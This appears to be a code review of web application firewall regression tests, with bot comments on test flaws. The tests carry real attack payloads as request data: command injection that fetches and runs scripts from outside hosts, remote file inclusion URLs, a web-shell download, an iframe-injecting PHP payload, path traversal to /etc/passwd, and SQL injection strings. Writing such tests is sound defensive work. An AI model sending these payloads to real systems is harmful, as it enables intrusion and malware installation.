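Review bot: In the 960038 test the request template still ends with a fixed `Proxy-Connection: keep-alive` line, which is itself one of the three `restricted_header` values, so the `Translate: f` and `Lock-Token:` iterations can pass on that header alone and do not show that the rule matches them. Remove the fixed `Proxy-Connection` line from this request so that `$restricted_header` is the only restricted header sent. In the 960010 test, a `%remark` noting that each `$type` value supplies its own semicolon ahead of `boundary=0000` would make the `Content-Type: $type boundary=0000` line less surprising.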

View File

@@ -0,0 +1,82 @@
%timeout 10
# FILE 35 - HTTP Bad Robots
%test Request Indicates a Security Scanner Scanned the Site (990002)
#####################################################
%output 990002
%var ua=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij
%var ua=Arachni/0.2.1
%var ua=w3af.sourceforge.net
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: $ua
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Indicates a Security Scanner Scanned the Site (990901)
#####################################################
%output 990901
%var header=Acunetix-Product: WVS/5.0 (Acunetix Web Vulnerability Scanner - EVALUATION)
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
$header
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Request Indicates a Security Scanner Scanned the Site (990902)
#####################################################
%output 990902
%var file=/nessustest
%request
GET $file HTTP/1.0
Host: $hostname
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
$header
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Rogue web site crawler (990012)
#####################################################
%output 990012
%var ua=DataCha0s/2.0
%var ua=Morfeus Fucking Scanner
%var ua=VoidEYE
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: $ua
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%endtest
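
Review bot: The 990902 request contains a `$header` line, but this test defines only `%var file=/nessustest`, and the documentation states that `%var` values are set only for the current test, so `$header` looks like a leftover from the 990901 test above and has no value here. Remove the line, or add the intended `%var header=...` to this test. The two tests named "Request Indicates a Security Scanner Scanned the Site" for 990002, 990901 and 990902 would also be easier to tell apart in the report if the names said what is being matched (User-Agent, request header, requested file).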

View File

@@ -0,0 +1,393 @@
%timeout 6
%test System Command Injection (950907)
###################################
%output 950907
%var command=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf *.txt');
%var command=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php
%request
GET /?foo=$command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Injection of Undocumented ColdFusion Tags (950008)
###################################
%output 950008
%var cf_command=cfusion_decrypt(string%2ckey)
%var cf_command=%3CCFINTERNALDEBUG%20ACTION%3D%22pcode%22%20OUTVAR%3D%22r_var%22%20TEMPLATEPATH%3D%22%23template%23%22%3E
%request
GET /?foo=$cf_command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test LDAP Injection Attack (950010)
###################################
%output 950010
%var ldap_command=jsmith)(|(objectclass=*)
%var ldap_command=joe)(|(password=*
%var ldap_command=(&(objectClass=*)(objectClass=resources))
%request
GET /?foo=$ldap_command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test SSI Injection Attack (950011)
###################################
%output 950011
%var ssi_command=%3C!--%23exec%20cmd%3D%22ls%22%20--%3E
%var ssi_command=%3C!--%23include%20virtual%3D%22%2Fetc%2Fpasswd%22%20--%3E
%request
GET /?foo=$ssi_command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Universal PDF XSS URL Detected (950018)
###################################
%output 950018
%var updf=http%3A%2F%2Fwww.example.com%2Ffile.pdf%23a%3Djavascript%3Aalert('Alert')
%request
GET /?foo=$updf HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Email Injection Attack (950019)
#####################################################
%output 950019
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: $CONTENT_LENGTH
body=email@anonymous.xxx%0ATo:email1@who.xxx
%test HTTP Request Smuggling Attack (950012)
###################################
%output 950012
%request
GET / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Transfer-Encoding: utf-8
Transfer-Encoding: utf-8
Keep-Alive: 300
Proxy-Connection: keep-alive
%test HTTP Request Smuggling (950012)
###################################
%output 950012
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Length: 3
Content-Length: 3
abc
%test HTTP response splitting (950910)
###################################
%output 950910
%request
GET /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html> HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test HTTP response splitting (950911)
###################################
%output 950911
%request
GET /?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Remote File Inclusion Attack (950117)
###################################
%output 950117
%request
GET /wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Remote File Inclusion Attack (950118)
###################################
%output 950118
%var rfi=/plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.luomoeillegno.com/extras/idxx.txt??
%var rfi=/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.luomoeillegno.com/extras/idxx.txt
%var rfi=/plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.luomoeillegno.com/extras/idxx.txt
%request
GET $rfi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Remote File Inclusion Attack (950119)
###################################
%output 950119
%var rfi=/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ezonplaza.com/img/idFARIZ.txt?
%var rfi=/bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr/upload/bbs/conf2.txt????
%var rfi=/components/com_uhp/uhp_config.php?mos/administrator/c/appserv/appserv/main.php?appserv_root=http://henry14.isfreeweb.com/zboard/id/auto1.txt????
%request
GET $rfi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Remote File Inclusion Attack (950120)
###################################
%output 950120
%var rfi=/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.ezonplaza.com/img/idFARIZ.txt??
%var rfi=/bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr/upload/bbs/conf2.txt?
%var rfi=/components/com_uhp/uhp_config.php?mos/administrator/c/appserv/appserv/main.php?appserv_root=http://henry14.isfreeweb.com/zboard/id/auto1.txt???
%request
GET $rfi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Session Fixation Attack (950009)
###################################
%output 950009
%request
GET /foo.php?bar=blah<script>document.cookie="sessionid=1234;%20domain=.example.dom";</script> HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.mummy.com/index.html
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Session Fixation Attack (950000)
###################################
%output 950000
%request
GET /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-sg
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Session Fixation Attack (950003)
###################################
%output 950003
%request
GET /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Referer: http://forum.antichat.ru/forum127.html
Keep-Alive: 300
Proxy-Connection: keep-alive
%test Remote File Access Attempt (950005)
###################################
%output 950005
%var file=../../../../../boot.ini
%var file=/etc/passwd
%var file=../../../../../../../../../../usr/local/app/apache2/conf/httpd.conf
%request
GET /index.php?file=News&op=$file%00 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test System Command Access (950002)
###################################
%output 950002
%var file=/d/winnt/system32/cmd.exe?/c+dir.
%request
GET /foo.aspx?$file HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-sg
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: $hostname
Keep-Alive: 300
Proxy-Connection: keep-alive
%test System Command Injection (950006)
###################################
%output 950006
%var command=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf *.txt');
%var command=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php
%request
GET /?foo=$command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test PHP Injection Attack (959151)
###################################
%output 959151
%var command=<?exec('wget%20http://r57.biz/r57.txt%20-O shell.php');?>
%var command=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E
%request
GET /?foo=$command HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
%test PHP Injection Attack (958976)
###################################
%output 958976|958977
%var php_code=%20%20if%20(!function_exists(%22fs_copy_dir%22))%20%7B%0A%20%20%20%20function%20fs_copy_dir(%24d%2C%24t)%20%7B%0A%20%20%20%20%20%20%24d%20%3D%20str_replace(%22%5C%5C%22%2CDIRECTORY_SEPARATOR%2C%24d)%3B%0A%20%20%20%20%20%20if%20(substr(%24d%2C-1)%20!%3D%20DIRECTORY_SEPARATOR)%20%7B%24d%20.%3D%20DIRECTORY_SEPARATOR%3B%7D%0A%20%20%20%20%20%20%24h%20%3D%20opendir(%24d)%3B%0A%20%20%20%20%20%20while%20((%24o%20%3D%20readdir(%24h))%20!%3D%3D%20FALSE)%20%7B%0A%20%20%20%20%20%20%20%20if%20((%24o%20!%3D%20%22.%22)%20and%20(%24o%20!%3D%20%22..%22))%20%7B%0A%20%20%20%20%20%20%20%20%20%20if%20(!is_dir(%24d.DIRECTORY_SEPARATOR.%24o))%20%7B%24ret%20%3D%20copy(%24d.DIRECTORY_SEPARATOR.%24o%2C%24t.DIRECTORY_SEPARATOR.%24o)%3B%7D%0A%20%20%20%20%20%20%20%20%20%20else%20%7B%24ret%20%3D%20mkdir(%24t.DIRECTORY_SEPARATOR.%24o)%3B%20fs_copy_dir(%24d.DIRECTORY_SEPARATOR.%24o%2C%24t.DIRECTORY_SEPARATOR.%24o)%3B%7D%0A%20%20%20%20%20%20%20%20%20%20if%20(!%24ret)%20%7Breturn%20%24ret%3B%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20closedir(%24h)%3B%0A%20%20%20%20%20%20return%20TRUE%3B%0A%20%20%20%20%7D
%var php_code=echo%20sr(15%2C%22%3Cb%3E%22.%24lang%5B%24language.'_text16'%5D.%24arrow.%22%3C%2Fb%3E%22%2C%22%3Cselect%20name%3D%5C%22method%5C%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22system%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22system%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Esystem%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22passthru%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22passthru%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Epassthru%3C%2Foption%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22exec%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22exec%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eexec%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22shell_exec%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22shell_exec%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eshell_exec%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22popen%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22popen%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Epopen%3C%2Foption%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Coption%20value%3D%5C%22proc_open%5C%22%20%3C%3F%20if%20(%24method%3D%3D%5C%22proc_open%5C%22)%20%7B%20echo%20%5C%22selected%5C%22%3B%20%7D%20%3F%3Eproc_open%3C%2Foption%3E
%request
POST / HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: $CONTENT_LENGTH
body=$php_code
%endtest
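
Review bot: In the LDAP (950010), SSI (950011) and Universal PDF XSS (950018) tests the `Accept` line ends in `q=0.5Accept-Language: en-us,en;q=0.5`, so two headers are fused: the request carries no `Accept-Language` header and the `Accept` value is malformed. Split it into two lines as the other tests in this file do, otherwise these three tests send a different request shape from the rest and a header-validation match could be confused with the id named in `%output`. Separately, the first `command` value for 950907 and 950006 contains a literal space (`rm%20-rf *.txt`), as does the first 959151 value (`-O shell.php`); substituted into `GET /?foo=$command HTTP/1.0` that produces a request line with an extra space, so encode it as `%20` unless the malformed request line is intended, and say so in a comment if it is.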

@@ -0,0 +1,208 @@
%timeout 10
# File 41 SQL Injection Attacks
%request
GET /?v=$sig HTTP/1.0
Host: $hostname
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.
Keep-Alive: 300
Proxy-Connection: keep-alive
%test SQL Comment Sequence Detected (981231)
########################################
%output 981231
%var sig=SELECT%2F*avoid-spaces*%2Fpassword%2F**%2FFROM%2F**%2FMembers
%var sig=%E2%80%98%20or%201%3D1%23%0A
%var sig=%E2%80%98%20or%201%3D1--%20-
%endtest
%test SQL Hex Encoding Identified (981260)
########################################
%output 981260
%var sig=1%20and%201%3D0%20%20Union%20Select%20%20%20UNHEX(HEX(concat(0x5B6B65795D%2Ctable_name%2C0x5B6B65795D)))%20%20%20FROM%20INFORMATION_SCHEMA.tables%20where%20table_schema%3DConcat(char(109)%2Cchar(101)%2Cchar(115)%2Cchar(115)%2Cchar(110)%2Cchar(101)%2Cchar(114)%2Cchar(98)%2Cchar(95)%2Cchar(119)%2Cchar(114)%2Cchar(100)%2Cchar(49)%2Cchar(50))%20LIMIT%201%2C1--
%var sig=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536--
%endtest
%test SQL Injection Attack: Common Injection Testing Detected (981318)
########################################
%output 981318
%var sig='%20and%200%20union%20select%201%2C2%2C3%2Cusername%2C5%2Cpassword%2C7%2C8%2C9%2C10%2C11%20from%20%23__users%23
%var sig=-1)%20UNION%20SELECT%201%2C2%2C3%2Cconcat(USER()%2C'
%endtest
%test SQL Injection Attack: SQL Operator Detected (981319)
########################################
%output 981319
%var sig=-4%20union%20select%201%2C2%2C(select(%40x)from(select(%40x%3A%3D0x00)%2C(select(null)from(information_schema.columns)where(table_schema!%3D0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(%40x%3A%3Dconcat(%40x%2C0x3c62723e%2Ctable_schema%2C0x2e%2Ctable_name%2C0x3a%2Ccolumn_name))))x)--
%var sig=14380586%20and%20user()%3C%3E1
%var sig=2946%20and%20ascii(substring((user())%2C1%2C1))%3E%3D1%2F*
%endtest
%test SQL Injection Attack: SQL Tautology Detected (950901)
########################################
%output 950901
%var sig=-9'%20union%20select%20concat(version())%2C2%2C3%2C4%2C5%2C6and'1'%3D'1
%var sig=1'%20or%20'1'!%3D'2%20order%20by%201--
%endtest
%test SQL Injection Attack: Common DB Names Detected (981320)
########################################
%output 981320
%var sig=3%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2Cconcat(user()%2Cversion()%2Cdatabase())%2C8%20from%20information_schema.tables
%var sig=918%20union%20select%200%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%20from%20msysobjects%20in%20'.'
%endtest
%test SQL SELECT Statement Anomaly Detection Alert (981317)
########################################
%output 981317
%var sig=247'%20and%201%3D1%20union%20all%20select%201%2C2%2C3%2C4%2C5%2Cconcat(username%2Cchar(58)%2Cpasswort)%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%20from%20az_user%2F*
%var sig=5%20and%201%3D(select%20first%201%20distinct%20rdb%24relation_name%20from%20rdb%24relations%20where%20rdb%24system_flag%3D0)--
%endtest
%test Blind SQL Injection Attack (950007)
########################################
%output 950007
%var sig=-2511%20union%20select%20table_name%20from%20sys.all_tables--
%var sig=1%20union%20select%201%2Cnull%2Cnull%2Cnull%2Ctable_name%7C%7Cchr(58)%7C%7Ccolumn_name%7C%7Cchr(58)%7C%7Cdata_type%20from%20(select%20a.*%2Crownum%20rnum%20from%20(select%20*%20from%20user_tab_columns%20where%20table_name%3Dchr(76)%7C%7Cchr(79)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(83)%20order%20by%20column_name)%20a%20where%20rownum%20%3C%3D%201)%20where%20rnum%20%3E%3D%201--
%endtest
%test SQL Injection Attack (950001)
########################################
%output 950001
%var sig=10%20UNION%20exec%20master..xp_cmdshell%20'dir'
%var sig=1'%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(mid(concat_ws(0x0b%2Cversion()%2Cuser()%2Cdatabase()%2C%40%40version_compile_os%2C0x0b)%2C1%2C63)%2C%20floor(rand(0)*2)))--
